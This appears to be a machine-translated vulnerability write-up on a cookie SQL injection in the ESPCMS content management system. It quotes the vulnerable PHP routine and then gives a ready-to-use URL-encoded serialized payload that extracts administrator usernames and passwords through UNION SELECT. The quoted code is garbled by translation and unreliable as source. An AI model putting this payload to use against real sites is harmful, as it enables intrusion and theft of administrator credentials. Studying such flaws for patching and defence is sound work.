ESPCMS latest cookie Injection Vulnerability Analysis

0 × 00Introduction:
Yisi ESPCMS is an enterprise website management system built based on LAMP. It is easy to operate, powerful, stable, scalable, and secure, and convenient for secondary development and post-maintenance, it helps you quickly and easily build a powerful and professional enterprise website.
0 × 01Vulnerability Analysis:
Function in_list (){
Parent: start_pagetemplate ();
$ Lng = (admin_LNG = 'big5 ')? $ This-> CON ['is _ lancode']: admin_LNG;
$ Cartid = $ this-> fun-> accept ('ecisp _ order_list ', 'C'); // receives cookies ['ecisp _ order_list']
$ Cartid = stripslashes (htmlspecialchars_decode ($ cartid ));
$ Uncartid =! Empty ($ cartid )? Unserialize ($ cartid): 0; // $ cartid has special format requirements
If ($ uncartid & is_array ($ uncartid )){
$ Didarray = $ this-> fun-> key_array_name ($ uncartid, 'did', 'amount ');
$ Didlist = $ this-> fun-> format_array_text (array_keys ($ didarray ),',');
If (! Empty ($ didlist )){
$ Db_table = db_prefix. 'document ';
$ Db_where = "isclass = 1 AND isorder = 1 AND did in ($ didlist) order by did DESC ";
$ SQL = "SELECT did, lng, pid, mid, aid, tid, sid, fgid, linkdid, isclass, islink, ishtml, ismess, isorder, purview, recommend, tsn, title, longtitle, color, author, source, pic, link, oprice, bprice, click, addtime, template, filename, filepath FROM $ db_table WHERE $ db_where "; // dynamically construct SQL statements
$ Rs = $ this-> db-> query ($ SQL); // directly bring in the query to directly obtain the value of cookies ['ecisp _ order_list '] without filtering, it is directly used to construct an SQL statement and bring it into the query. Therefore, a cookie injection is formed here.
0 × 02Difficulties:
The received cookies ['ecisp _ order_list '] are transmitted through htmlspecialchars_decode (), stripslashes (), unserialize (), key_array_name (), and array_keys () and format_array_text () functions.
Stripslashes () allows injection statements to ignore the impact of GPC.
However, the use of unserialize () makes it more difficult to construct exp. Because the value of unserialize () is passed in, a specified special format must be used (in implementation, I have not completely understood this special format)
I successfully constructed exp by luck and a little skill. I will not elaborate on it here. You can print the return values of several functions to find the construction method. (Or, you can use the exp below to find some rules)
0 × 03 EXP:
A % 3a1% 3a % 7bs % 3a3% 3a % 22k23% 22% 3ba % 3a2% 3a % 7bs % 3a3% 3a % 22did % 22% 3bs % 3a159% 3a % 2224) + and + 1% 3d2 + union + select + 1% 2c2% 2c3% 2c4% 2c5% 2c6% 2c7% 2c8% 2c9% 2c10% 2c11% 2c12% 2c13% 2c14% 2c15% 2c16% 2 cpassword % 2 cusername % 2c19% 2c20% 2c21% 2c22% 2c23% 2c24% 2c25% 2c26% 2c27% 2c28% 2c29% 2c30% 2c31 + from + sources + where + 1 + in + (1% 22% 3bs % 3a6% 3a % 22 amount % 22% 3bi % 3a1% 3b % 7d % 7d0 × 04Usage:
As we all know, in order to prevent the use of exp from being too low (in fact, it is already very low), we will not show the utilization process one by one.
0 × 05Demo:
Inject to get administrator information:

Official Background:



 
0 × 06Ad Time:
Long term draft of Taoyuan magazine, mail: lovelessyuyu353@qq.com